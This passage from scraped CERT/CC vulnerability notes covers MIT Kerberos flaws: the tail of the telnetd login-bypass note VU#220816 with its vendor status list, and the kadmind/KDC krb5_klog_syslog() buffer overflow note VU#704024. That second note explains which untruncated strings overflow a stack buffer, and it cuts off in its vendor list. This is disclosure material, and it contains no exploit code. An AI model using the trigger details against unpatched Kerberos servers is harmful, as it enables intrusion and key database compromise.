Statement\n\nThe vulnerabilities references by VU#220816 do not apply to any CyberSafe products, including all versions of TrustBroker and Challenger.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Force10 Networks, Inc. Not Affected\n\nNotified: March 21, 2007 Updated: March 28, 2007 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Heimdal Kerberos Project Not Affected\n\nNotified: March 21, 2007 Updated: March 30, 2007 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Hewlett-Packard Company __ Not Affected\n\nNotified: March 21, 2007 Updated: May 16, 2007 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nHP-UX telnetd(1M) is not vulnerable to CERT VU#220816.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Hitachi Not Affected\n\nNotified: March 21, 2007 Updated: April 02, 2007 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Intoto __ Not Affected\n\nNotified: March 21, 2007 Updated: March 28, 2007 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nIntoto products are not vulnerable to the potential buffer overflow attacks on MIT Kerberos documented in this vulnerability note, as this component is not used in Intoto products.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Juniper Networks, Inc. __ Not Affected\n\nNotified: March 21, 2007 Updated: March 28, 2007 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nJuniper Networks products are not susceptible to this vulnerability.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Microsoft Corporation Not Affected\n\nNotified: March 21, 2007 Updated: March 28, 2007 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### NEC Corporation Not Affected\n\nNotified: March 21, 2007 Updated: April 06, 2007 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Openwall GNU/*/Linux __ Not Affected\n\nNotified: March 21, 2007 Updated: March 28, 2007 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nOpenwall GNU/*/Linux is not vulnerable. We don't provide Kerberos.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Symantec, Inc. Not Affected\n\nNotified: March 21, 2007 Updated: April 05, 2007 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### 3com, Inc. Unknown\n\nNotified: March 21, 2007 Updated: March 21, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### AT&amp;T Unknown\n\nNotified: March 21, 2007 Updated: March 21, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Alcatel Unknown\n\nNotified: March 21, 2007 Updated: March 21, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Apple Computer, Inc. Unknown\n\nNotified: March 21, 2007 Updated: March 21, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Avaya, Inc. Unknown\n\nNotified: March 21, 2007 Updated: March 21, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Avici Systems, Inc. Unknown\n\nNotified: March 21, 2007 Updated: March 21, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Borderware Technologies Unknown\n\nNotified: March 21, 2007 Updated: March 21, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Charlotte's Web Networks Unknown\n\nNotified: March 21, 2007 Updated: March 21, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Check Point Software Technologies Unknown\n\nNotified: March 21, 2007 Updated: March 21, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Chiaro Networks, Inc. Unknown\n\nNotified: March 21, 2007 Updated: March 21, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Cisco Systems, Inc. Unknown\n\nNotified: March 21, 2007 Updated: March 21, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Clavister Unknown\n\nNotified: March 21, 2007 Updated: March 21, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Computer Associates Unknown\n\nNotified: March 21, 2007 Updated: March 21, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Conectiva Inc. Unknown\n\nNotified: March 21, 2007 Updated: March 21, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Cray Inc. Unknown\n\nNotified: March 21, 2007 Updated: March 21, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### D-Link Systems, Inc. Unknown\n\nNotified: March 21, 2007 Updated: March 21, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Data Connection, Ltd. Unknown\n\nNotified: March 21, 2007 Updated: March 21, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### EMC, Inc. (formerly Data General Corporation) Unknown\n\nNotified: March 21, 2007 Updated: March 21, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Engarde Secure Linux Unknown\n\nNotified: March 21, 2007 Updated: March 21, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Ericsson Unknown\n\nNotified: March 21, 2007 Updated: March 21, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Extreme Networks Unknown\n\nNotified: March 21, 2007 Updated: March 21, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### F5 Networks, Inc. Unknown\n\nNotified: March 21, 2007 Updated: March 21, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Fortinet, Inc. Unknown\n\nNotified: March 21, 2007 Updated: March 21, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Foundry Networks, Inc. Unknown\n\nNotified: March 21, 2007 Updated: March 21, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### FreeBSD, Inc. Unknown\n\nNotified: March 21, 2007 Updated: March 21, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Fujitsu Unknown\n\nNotified: March 21, 2007 Updated: March 21, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Global Technology Associates Unknown\n\nNotified: March 21, 2007 Updated: March 21, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Hyperchip Unknown\n\nNotified: March 21, 2007 Updated: March 21, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### IBM Corporation Unknown\n\nNotified: March 21, 2007 Updated: March 21, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### IBM Corporation (zseries) Unknown\n\nNotified: March 21, 2007 Updated: March 21, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### IBM eServer Unknown\n\nNotified: March 21, 2007 Updated: March 21, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### IP Filter Unknown\n\nNotified: March 21, 2007 Updated: March 21, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Immunix Communications, Inc. Unknown\n\nNotified: March 21, 2007 Updated: March 21, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Ingrian Networks, Inc. Unknown\n\nNotified: March 21, 2007 Updated: March 21, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Intel Corporation Unknown\n\nNotified: March 21, 2007 Updated: March 21, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Internet Security Systems, Inc. Unknown\n\nNotified: March 21, 2007 Updated: March 21, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### KTH Kerberos Team Unknown\n\nNotified: March 21, 2007 Updated: March 21, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Linksys (A division of Cisco Systems) Unknown\n\nNotified: March 21, 2007 Updated: March 21, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Lucent Technologies Unknown\n\nNotified: March 21, 2007 Updated: March 21, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Luminous Networks Unknown\n\nNotified: March 21, 2007 Updated: March 21, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### MontaVista Software, Inc. Unknown\n\nNotified: March 21, 2007 Updated: March 21, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Multinet (owned Process Software Corporation) Unknown\n\nNotified: March 21, 2007 Updated: March 21, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Multitech, Inc. Unknown\n\nNotified: March 21, 2007 Updated: March 21, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### NetBSD Unknown\n\nNotified: March 21, 2007 Updated: March 21, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Network Appliance, Inc. Unknown\n\nNotified: March 21, 2007 Updated: March 21, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### NextHop Technologies, Inc. Unknown\n\nNotified: March 21, 2007 Updated: March 21, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Nokia Unknown\n\nNotified: March 21, 2007 Updated: March 21, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Nortel Networks, Inc. Unknown\n\nNotified: March 21, 2007 Updated: March 21, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Novell, Inc. Unknown\n\nNotified: March 21, 2007 Updated: March 21, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### OpenBSD Unknown\n\nNotified: March 21, 2007 Updated: March 21, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### QNX, Software Systems, Inc. Unknown\n\nNotified: March 21, 2007 Updated: March 21, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Redback Networks, Inc. Unknown\n\nNotified: March 21, 2007 Updated: March 21, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Riverstone Networks, Inc. Unknown\n\nNotified: March 21, 2007 Updated: March 21, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Secure Computing Network Security Division Unknown\n\nNotified: March 21, 2007 Updated: March 21, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Secureworx, Inc. Unknown\n\nNotified: March 21, 2007 Updated: March 21, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Silicon Graphics, Inc. Unknown\n\nNotified: March 21, 2007 Updated: March 21, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Slackware Linux Inc. Unknown\n\nNotified: March 21, 2007 Updated: March 21, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Sony Corporation Unknown\n\nNotified: March 21, 2007 Updated: March 21, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Stonesoft Unknown\n\nNotified: March 21, 2007 Updated: March 21, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### The SCO Group Unknown\n\nNotified: March 21, 2007 Updated: March 21, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Turbolinux Unknown\n\nNotified: March 21, 2007 Updated: March 21, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Unisys Unknown\n\nNotified: March 21, 2007 Updated: March 21, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Watchguard Technologies, Inc. Unknown\n\nNotified: March 21, 2007 Updated: March 21, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Wind River Systems, Inc. Unknown\n\nNotified: March 21, 2007 Updated: March 21, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### ZyXEL Unknown\n\nNotified: March 21, 2007 Updated: March 21, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### eSoft, Inc. Unknown\n\nNotified: March 21, 2007 Updated: March 21, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### netfilter Unknown\n\nNotified: March 21, 2007 Updated: March 21, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\nView all 90 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics\n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References\n\n * <http://web.mit.edu/Kerberos/advisories/MITKRB5-SA-2007-001-telnetd.txt>\n * <http://secunia.com/advisories/24757/>\n * <http://secunia.com/advisories/24735/>\n * <http://secunia.com/advisories/24750/>\n * <http://secunia.com/advisories/24740/>\n * <http://secunia.com/advisories/24755/>\n * <http://securitytracker.com/alerts/2007/Apr/1017848.html>\n\n### Acknowledgements\n\nThis issue was reported in MIT krb5 Security Advisory MITKRB5-SA-2007-001.\n\nThis document was written by Chris Taschner.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2007-0956](<http://web.nvd.nist.gov/vuln/detail/CVE-2007-0956>) \n---|--- \n**Severity Metric:** | 17.85 \n**Date Public:** | 2007-04-03 \n**Date First Published:** | 2007-04-03 \n**Date Last Updated: ** | 2007-05-16 19:23 UTC \n**Document Revision: ** | 38 \n", "cvss3": {}, "published": "2007-04-03T00:00:00", "type": "cert", "title": "MIT Kerberos 5 telnet daemon allows login as arbitrary user", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-0956"], "modified": "2007-05-16T19:23:00", "id": "VU:220816", "href": "https://www.kb.cert.org/vuls/id/220816", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-28T14:34:45", "description": "### Overview\n\nThe Kerberos administration daemon contains a buffer overflow that may allow a remote, authenticated attacker to execute arbitrary code or cause a denial of service.\n\n### Description\n\nA vulnerability exists in the way the `krb5_klog_syslog()` function used by the Kerberos administration daemon handles specially crafted strings. This vulnerability may cause a buffer overflow that could allow a remote, authenticated user to execute arbitrary code. According to MIT krb5 Security Advisory [MITKRB5-SA-2007-002](<http://web.mit.edu/Kerberos/advisories/MITKRB5-SA-2007-002-syslog.txt>):\n\n_krb5_klog_syslog() uses vsprintf() to format text into a fixed-length stack buffer. Format specifiers such as \"%s\" used in calls to krb5_klog_syslog() may allow formatting of strings of sufficient length to overwrite memory past the end of the stack buffer__._ \n \n_Certain strings received from the client by the kadmin daemon are not truncated prior to logging. Among these strings is the target principal for the kadmin operation. \n \nThe KDC truncates most client-originated strings prior to logging. One sort of string which is not truncated is a transited-realms string. A malicious KDC sharing a key with the target realm may issue tickets with specially-crafted transited-realms strings to exploit this vulnerability. There are other places where an authenticated user may cause the KDC to log a string which triggers the vulnerability._ \n \nNote that this issue affects all releases of MIT krb5 up to and including krb5-1.6. Other server applications that call the `krb5_klog_syslog()`function provided with MIT krb5 may also be affected. \n \nThis vulnerability can be triggered by sending a specially crafted Kerberos message to a vulnerable system. \n \n--- \n \n### Impact\n\nA remote, authenticated user may be able to execute arbitrary code on an affected system or cause the affected program to crash, resulting in a denial of service. Secondary impacts of code execution include complete compromise of the Kerberos key database. \n \n--- \n \n### Solution\n\n**Apply Patch** \n \n \nA patch can be obtained from MIT krb5 Security Advisory [MITKRB5-SA-2007-002](<http://web.mit.edu/Kerberos/advisories/MITKRB5-SA-2007-002-syslog.txt>). MIT also states that this will be addressed in the upcoming krb5-1.6.1 release. \n \n--- \n \n### Vendor Information\n\n704024\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Apple Computer, Inc. __ Affected\n\nNotified: April 04, 2007 Updated: April 20, 2007 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to Apple Security Update [2007-004](<http://docs.info.apple.com/article.html?artnum=305391>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23704024 Feedback>).\n\n### MIT Kerberos Development Team __ Affected\n\nUpdated: April 03, 2007 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to [MITKRB5-SA-2007-002](<http://web.mit.edu/Kerberos/advisories/MITKRB5-SA-2007-002-syslog.txt>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23704024 Feedback>).\n\n### Mandriva, Inc. __ Affected\n\nNotified: April 04, 2007 Updated: April 05, 2007 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to [MDKSA-2007:077](<http://www.mandriva.com/security/advisories?name=MDKSA-2007:077>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23704024 Feedback>).\n\n### Novell, Inc. __ Affected\n\nNotified: April 04, 2007 Updated: April 05, 2007 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to Novell Security Advisory [3618705](<https://secure-support.novell.com/KanisaPlatform/Publishing/150/3618705_f.SAL_Public.html>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23704024 Feedback>).\n\n### Red Hat, Inc. __ Affected\n\nUpdated: April 02, 2007 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to [RHSA-2007-0095](<https://rhn.redhat.com/errata/RHSA-2007-0095.html>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23704024 Feedback>).\n\n### SUSE Linux __ Affected\n\nNotified: April 04, 2007 Updated: April 05, 2007 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to [SUSE-SA:2007:025](<http://lists.suse.com/archive/suse-security-announce/2007-Apr/0001.html>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23704024 Feedback>).\n\n### Trustix Secure Linux __ Affected\n\nNotified: April 04, 2007 Updated: April 06, 2007 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to Trustix Secure Linux Security Advisory [#2007-0012](<http://www.trustix.org/errata/2007/0012/>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23704024 Feedback>).\n\n### rPath __ Affected\n\nUpdated: April 05, 2007 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to [rPSA-2007-0063-1](<http://lists.rpath.com/pipermail/security-announce/2007-April/000167.html>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23704024 Feedback>).\n\n### Cisco Systems, Inc. Not Affected\n\nUpdated: April 02, 2007 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Hitachi Not Affected\n\nUpdated: April 02, 2007 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### IBM Corporation __ Not Affected\n\nUpdated: April 04, 2007 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nKerberos is available for the AIX Operating System via Network Authentication Services for AIX. Network Authentication Services for AIX is not affected by the issues addressed in MITKRB5-SA-2007-002 [CVE-2007-0957, CERT/CC VU#704024].\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### NEC Corporation Not Affected\n\nNotified: April 04, 2007 Updated: April 06, 2007 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Openwall GNU/*/Linux __ Not Affected\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nOpenwall GNU/*/Linux is not vulnerable. We don't provide Kerberos.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### 